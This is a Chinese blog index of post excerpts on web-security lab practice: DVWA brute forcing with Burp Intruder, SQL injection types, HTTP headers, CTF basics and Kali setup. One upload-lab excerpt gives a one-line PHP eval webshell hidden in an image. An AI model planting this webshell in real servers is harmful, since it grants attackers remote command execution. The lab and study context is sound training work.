摘要: brute force LOW 输入账号密码直接抓包就行 接着ctrl+i传输到intruder模块中 为需要爆破的加上 §,不爆破的不加 选择攻击类型为Cluster bomb,选择username和password的参数作为爆破点; Cluter bomb是两个字典进行交叉枚举,适用于用户名密码 阅读全文
posted @ 2021-02-26 00:22 upstream_yu 阅读(282) 评论(0) 推荐(0) 编辑
摘要: background1基础部分 注入分类: 基于从服务器接收到的相应: 基于错误的SQL注入 联合查询的类型 堆叠查询注射 SQL盲注 布尔盲注 时间盲注 报错盲注 基于如何处理输入的SQL查询(数据类型) 基于字符串 数字或者整数 基于程度和顺序的注入 一阶注射 二阶注射 基于注入点的位置 通过用 阅读全文
posted @ 2021-02-26 00:20 upstream_yu 阅读(294) 评论(0) 推荐(0) 编辑
摘要: 使用dotnet-cnblog上传图片到博客园 安装 .Net Core SDK 下载地址:https://dotnet.microsoft.com/learn/dotnet/hello-world-tutorial/install 根据链接去下载即可,版本应该是不会有问题的 安装dotnet-cn 阅读全文
posted @ 2021-02-26 00:19 upstream_yu 阅读(90) 评论(0) 推荐(0) 编辑
摘要: 文件上传通关 靶场搭建环境:phpstudy_pro 在标注了的地方是:phpstudy2018 第一步制作图片马: 找到一个图片,然后用notepad++打开,然后在图片最后加上一句话木马即可; 木马代码: <?php @eval($_REQUEST['cmd'])?> pass-01 这里让我们 阅读全文
posted @ 2021-02-25 22:15 upstream_yu 阅读(195) 评论(0) 推荐(0) 编辑
摘要: 在利用抓包工具进行抓包的时候,我们能看到很多的项,下面详细讲解每一项。 HTTP 头部详解 1、 Accept:告诉 WEB 服务器自己接受什么介质类型,/ 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type。 2、 Accept-Charset: 浏览器申明自己接收的 阅读全文
posted @ 2020-12-02 22:35 upstream_yu 阅读(99) 评论(0) 推荐(1) 编辑
摘要: less1-4 语法:Select 列名称 from 表名称 (where column_name=’xxx’ and …) 在数据库中: information_schema:存放和数据库有关的东西 在information_schema中有SCHEMATA这是存放和数据库有关的数据库的名字 在i 阅读全文
posted @ 2020-11-17 22:34 upstream_yu 阅读(116) 评论(0) 推荐(1) 编辑
摘要: 第一题:view_source: 顾名思义就是查看网页源代码,按一下f12就ok 第二题:robots协议 换言之就是,robots协议告诉了我们,什么可以爬,什么不可以爬,要是觉得坐牢没什么,那就可以不看了; 查看网页的robots协议:在网页后面加上/robots.txt就ok了 Allow 代 阅读全文
posted @ 2020-10-21 12:36 upstream_yu 阅读(223) 评论(0) 推荐(0) 编辑
摘要: 安装 root@kali:~# apt -y install apache2 mariadb-common mariadb-server php php-mysql php-gd root@kali:~# systemctl enable apache2 && systemctl restart a 阅读全文
posted @ 2020-10-20 08:32 upstream_yu 阅读(895) 评论(0) 推荐(0) 编辑
摘要: 03:什么是操作系统: 没有安装操作系统的计算机,通常称为:裸机 l 如果想在裸机上运行自己编写的程序就必须使用计算机语言书写程序 l 如果安装了操作系统,就可以在操作系统上安装支持的高级语言环境,用高级语言来开发程序: 由操作系统命令CPU干活了 由操作系统来查找内存的数据 由操作系统来从硬盘中加 阅读全文
posted @ 2020-08-05 22:31 upstream_yu 阅读(196) 评论(0) 推荐(0) 编辑